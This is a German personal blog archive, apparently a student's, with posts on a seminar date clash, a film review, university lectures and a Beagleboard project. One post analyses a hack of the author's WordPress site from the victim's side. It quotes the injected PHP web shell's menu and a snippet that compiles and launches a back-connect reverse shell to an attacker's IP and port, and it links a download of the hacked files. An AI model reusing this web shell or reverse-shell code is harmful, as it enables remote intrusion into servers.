Archiv des Autors: Christian

Seminar an Pfingsten

Christian hat mich darauf aufmerksam gemacht, dass ein Termin meines ZAQ-Seminars „Rhetorik in der Gesprächsführung“ eiskalt auf den 22. Mai gelegt wurde – Pfingstsamstag. Und was mache ich seit vielen Jahren an Pfingsten jeden Jahres? Richtig, ich fahre als Gruppenleiter aufs Pfingstlager der Pfarrjugend St.Michael Wermelskirchen.
Thema dieses Jahr: Märchen, Mythen und Legenden 😉

Daran, dass dort ein Termin liegen könnte, habe ich bei der Auswahl gar keinen Gedanken verschwendet, da die Pfingstferien offiziell vom 21.5 bis zum 25.5 „(vorlesungs)frei“ sind. Noch hoffe ich auf ein Versehen bei der Terminvergabe und werde mich morgen erkundigen, ob das IWZ überhaupt an diesem Wochenende geöffnet hat. Aber die ZAQ Kurse liegen so außerhalb des normalen Vorlesungsablaufs, dass ich mit allem rechne. 🙁

Einen gewissen Prozentsatz des Seminars darf man ja blau machen, aber acht Stunden sind da leider zu viel – sonst würde ich es ernsthaft in Betracht ziehen.Â Im schlimmsten Fall, leihe ich mir also ein Auto und darf am Pfingstsamstag zwei MalÂ die Strecke Köln <-> Eifel fahren. Oder wenn praktikabel teilweise mit der Bahn. Klasse.

Ich wurde gehackt

Der WordPress-Problem von Vorgestern ist ein Hack!

Neuste WordPress-Version und ich kann nichts dagegen machen, als Passwörter zu tauschen und die DB zu sichern. Verdammt.

Thread im WordPress.com Forum.

ï»¿Nachtrag:

Hab es meinem Provider gemeldet für den Fall, dass es nicht WordPress-spezifisch ist, sondern die Lücke am Server an sich liegt.

Für alle, die sich die veränderten Dateien anschauen wollen: https://www.caracasa.de/files/hacked_files.tar.bz2

Das Reverse-engineeren ist gar nicht so einfach, wenn der Hacker alles Base64 kodiert und immer wieder verschachtelt mit eval interpretieren lässt.
Damn you php und all scripting-languages!

Nachtrag2:

Laut Code, Â kann der Hacker beliebige Dateien anfordern, ein Backup der MySQL-Datenbank machen, phpinfo() aufrufen, Befehle ausführen und beliebigen PHP-Code ausführen. Alles schön gesteuert über eine kleine Webseite mit Login über Javascript.

&lt;td&gt;&lt;span style="float:right;"&gt;Safe Mode:&lt;?php echo getcfg('safe_mode');?&gt;&lt;/span&gt;
 
<span style="white-space: pre;"> </span>&lt;a href="javascript:goaction('logout');"&gt;Logout&lt;/a&gt; |
 
<span style="white-space: pre;"> </span>&lt;a href="javascript:goaction('file');"&gt;File Manager&lt;/a&gt; |
 
<span style="white-space: pre;"> </span>&lt;a href="javascript:goaction('sqladmin');"&gt;MySQL Manager&lt;/a&gt; |
 
<span style="white-space: pre;"> </span>&lt;a href="javascript:goaction('sqlfile');"&gt;MySQL Upload &amp;amp; Download&lt;/a&gt; |
 
<span style="white-space: pre;"> </span>&lt;a href="javascript:goaction('shell');"&gt;Execute Command&lt;/a&gt; |
 
<span style="white-space: pre;"> </span>&lt;a href="javascript:goaction('phpenv');"&gt;PHP Variable&lt;/a&gt; |
 
<span style="white-space: pre;"> </span>&lt;a href="javascript:goaction('eval');"&gt;Eval PHP Code&lt;/a&gt;
 
<span style="white-space: pre;"> </span>&lt;?php if (!IS_WIN) {?&gt; | &lt;a href="javascript:goaction('backconnect');"&gt;Back Connect&lt;/a&gt;&lt;?php }?&gt;
 
<span style="white-space: pre;"> </span>&lt;/td&gt;

Der Kompiliert sich sogar was Nettes mit dem GCC

if ($use == 'perl') {
<div id="_mcePaste">cf('/tmp/angel_bc',$back_connect);</div>
<div id="_mcePaste">$res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &amp;");</div>
<div id="_mcePaste">} else {</div>
<div id="_mcePaste">cf('/tmp/angel_bc.c',$back_connect_c);</div>
<div id="_mcePaste">$res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');</div>
<div id="_mcePaste">@unlink('/tmp/angel_bc.c');</div>
<div id="_mcePaste">$res = execute("/tmp/angel_bc $yourip $yourport &amp;");</div>
if ($use == 'perl') {			cf('/tmp/angel_bc',$back_connect);			$res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &amp;");		} else {			cf('/tmp/angel_bc.c',$back_connect_c);			$res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');			@unlink('/tmp/angel_bc.c');			$res = execute("/tmp/angel_bc $yourip $yourport &amp;");

So richtig kompatibel mit der aktuellen WordPress-Version (2.9.2) scheint das Script ja nicht zu sein, wenn es sich mit den erwähnten Ausfällen bemerkbar macht.

Grad noch gefunden – ein Plugin für WordPress um Exploits zu finden:
http://wordpress.org/extend/plugins/exploit-scanner/

Das läuft gerade, aber die entsprechenden Dateien sind ja schon weg.

hier geht es weiter: Ich wurde gehackt 2

Film: Alice im Wunderland

Eine leckere Schokokusstorte hat Andrea mir gestern zum Geburtstag gezaubert und mich am Abend noch heimlich nach Wiesdorf ins Kino gebracht.

Tim Burtons Alice im Wunderland in 3D.

Wer auch immer dieseÂ CharaktereÂ ausgearbeitet hat (wahrscheinlich Burton selbst) stammt wirklich aus einer ganz anderen Welt. Die Figuren selbst sind natürlich aus den Vorlagen bekannt, Mr. Depp spielt seine Rollen eh alle sehr ähnlich, aber manchmal ist es einfach nur noch absurd. 😉 Kopf ab! Die Altersempfehlung von 12 Jahren kann ich unterschreiben – bei der Klettereinlage der geschrumpften Alice über die im Burggraben treibenden Köpfe wäre jedem 6-jährigen der Spaß an Plüschhasen und bunter Fantasiewelt vergangen. Für meinen Geschmack hätte die Grinsekatze einen größeren Part spielen können. Dem Schweben, Drehen, Winden, Vergehen, Erscheinen undÂ TeleportierenÂ hätte ich gerne noch länger zugesehen. In einigen Szenen (z.B. der Sturz in den Kaninchenbau) ist mir mal wieder stark aufgefallen, dass die Bildfrequenz im Kino für die Shutter-Technik zu niedrig ist – ich weiß da einfach nicht mehr, wo ich überall hingucken muss, wenn sich der Bildinhalt sowohl von der schnellen Szene, als auch durch das Ruckeln schlagartig ändert.

Kleiner Höhepunkt unter den Filmtrailern: Tron Legacy

Den ersten Teil hab ich mir gleich nach dem ersten viralen Trailer noch einmal angesehen. Nach all den Jahren ist die Optik trotzdem noch zeitlos-modern und ich wünsch mir sehnlichst einen Digitalisierer fürÂ zu Hause. 😉 Den neuen Trailer (in 3D!)Â kannte ich in der Version noch nicht, aber obwohl die Lightcycle-Scene dieses Mal etwas kürzer kommt, kann ich es kaum abwarten (Dezember 2010). Allerdings hatte ich gestern nicht den Eindruck, dass viele der anderen Anwesenden etwas damit anzufangen wussten.

Aber für Fortsetzungen von den klassischen Nerdfilmen bin ich natürlich immer zu haben.

Vorlesung: Verteilte und mobile Anwendungen

Heute war die erste Vorlesung „Verteilte und mobile Anwendungen„. Themen sind die Programmierung für mobile Geräte wie z.B. Smartphones inbesondere JavaME und Android API, aber auch eine grobe Übersicht der anderen großen BS wie IPhone OS und Symbia OS.

Für 20 Personen gab es Praktikums-Plätze und bestimmt die doppelte Zahl wollte teilnehmen.Â Den Fall habe ich bisher in Köln noch nicht erlebt und deshalb hatte ichÂ ein wenig Sorge, mich auf die Chance in einem Losverfahren verlassen zu müssen. Zu meinem Glück ging es letztendlich aber nach Fortschritt des Studiums bzw. bestandenen Softwarepraktika. Nach welchem Muster die resltichen fünf Plätze nach der Vorlesung verteilt wurden kann ich nicht sagen, aber da werden einige verärgert nach Hause gegangen sein.
Eine neue Vorlesung, die Buzzwords Â „Android“ und „Smartphone“ auf dem Modulbogen – das musste wohl so kommen.

Die Entwicklungsumgebung unter Eclipse steht bereits für beide Praktikumsplattformen, auch wenn der Android-Emulator die Hardware von meinem Notebook ordentlich in die Knie zwinkt. Eine Minute bis die Anwendung zur Verfügung steht muss ich schon einplanen – dabei sehe ich mir kleine Änderungen doch gerne mal auf die Schnelle im laufenden Programm an. In Zukunft muss ich also „sammeln“. 🙂

Auf absehbare Zeit gibt es bestimmt auch eine Android-Schnittstelle für die Ubuntu Desktop Edition bzw. Â normale Distributionen im Allgemeinen, um sich das zu ersparen.Â Die Lösung fände ich auch für ein offenes Tablett am besten, um alle Möglichkeiten offen zu halten. Android im Fenster gibt es bereits hier zu sehen – lange kann es also nicht mehr dauern.

Probleme mit WordPress

Diesen Eintrag kann ich nur über „Quickpress“ im Dashboard erstellen. Im Backend liefern mir post.php und post-new.php nur noch verschandelte HTML-Seiten aus, die dem Inhalt der admin-footer.php entsprechen. Aus den PHP-Skripten kann ich dafür keinen Grund erkennen.

Mal sehen, was meine Frage im WordPress-Forum ergibt – zur Zeit bin ich nur ratlos. 🙁

Nachtrag:

Irgendwie ist es ja immer so. Kaum habe ich meine bestes Englisch für die Supportforen herausgekramt, fällt mir das Naheliegenste ein. In diesem Fall einfach das wp-admin Verzeichnis mit den Quellen zu überschreiben.

Bleibt die Frage wie und wann meine WordPress-Installation in Mitleidenschaft gezogen wurde.

Meine Passwörter hab ich vorsorglich geändert. Sehr seltsam.

Ferien oder doch nicht?

Es gibt da eine Folge von How I met your mother, in der Marshall auf die Online-Ergebnisse seiner Anwaltsprüfung wartet, das Passwort vergisst und dann vorÂ NervositätÂ mächtig am Rad dreht. Kann ich inzwischen sehr gut nachvollziehen. Die letzte Prüfung am Freitag ist sehr gut schaffbar ohne die ganze Woche vor den Unterlagen zu verbringen. Im Prinzip wäre jetzt also die richtige Zeit, die letzten freien Tage – bevor nächste Woche wieder der Alltag beginnt – in aller Entspannung mit dem zu füllen, was man an den freien Tagen halt so macht. Füsse hoch, mit dem Rad raus (okay, bei dem Wetter nicht) und die Stunden mit Programmieren und Spielen verbringen.

Aber ich bekomme diese Physikprüfung von letztem Donnerstag nicht aus dem Kopf. Wahrscheinlich hab ich im letzten Monat verlernt, wie es ist, wenn am Horizont keine „furchtbar wichtige“ Prüfung lauert. Mein kleiner „MassEffect 2„-Ausflug war begleitet von leichten bis mittleren Schuldgefühlen. 😉 Man hätte in der Zeit ja auch lernen können …

Aber ich bemühe mich: Die Wiederholung von Fluch der Karibik 3 heute Mittag war ein Anfang, morgen räume ich demonstrativ dieÂ verstreuten Unterlagen des 5. Semesters ins Archiv (nein, nicht in den Mülleimer) und geh ins neue Leverkusener Shoppingcenter ein überteuertes Eis essen. Und dann entweder Fallout 3 oder The Witcher – beschlossen!

Neue Seite: Beagleboard (Revision C4)

Ich hatte ja schon ein paar Mal über mein Bachelorthema geschrieben. Falls ihr euch näherÂ für technischen Details des Beagleboards interessiert, schaut euch mal diese Seite hier an. Die Information ist natürlich etwas redundantÂ zu den offiziellen Quellen, wo man sich natürlich alles aus dem technischen Handbuch zusammensuchen kann. Im Laufe meiner Bearbeitungszeit habe ich vor, immer wieder kleine Artikel zum Thema zu verfassen und als Basis für die Arbeit zu verwenden.

Weiter geht es dann in Zukunft mit dem Bau der OpenEmbedded-Umgebung, Konfiguration der Softwareumgebung und meinen ersten Gehversuchen auf dem DSP.

Seite: Beagleboard (Revision C4)

Das Theme für 2010

Ich hab heute mal das Theme etwas aufgefrischt – alles etwas breiter ohne es komplett umzukrempeln. Noch nicht 100% fertig, aber reif um auf den Server zu wandern.

Eigentlich halte ich meine Daten recht ordentlich beieinander, doch die Quelldaten für die Headergrafik sindÂ jedes Mal wie vom Erdboden verschwunden. Nur von 2005 und 2007 hab ich etwas in den Archiven gefunden. Aber so hatte ich wenigstens die Chance sauber auf Inkscape zu wechseln. Tolles Programm b.t.w. 😉

Nachtrag: Christian hat mich eben noch auf einen Fehler in der Seitenansicht gebracht. In der page.php hatte ich irgendwo ein <span> für die Seiten-Navigation aufgemacht, aber mit einem </div> geschlossen. Waren das noch Zeiten, als Tabellenlayout Stand der Technik war, und ein falsches Tag im Zusammenhang mit Containern nicht alles zerreißen konnte. 😉 Laut browsershots.org ist die Darstellung in allen gängigen Browsern konsistent – man muss nur alles testen. Valides XHTML 1.0 Transitional hoffe ich. Meine Stylesheets haben allerdings noch einige Macken.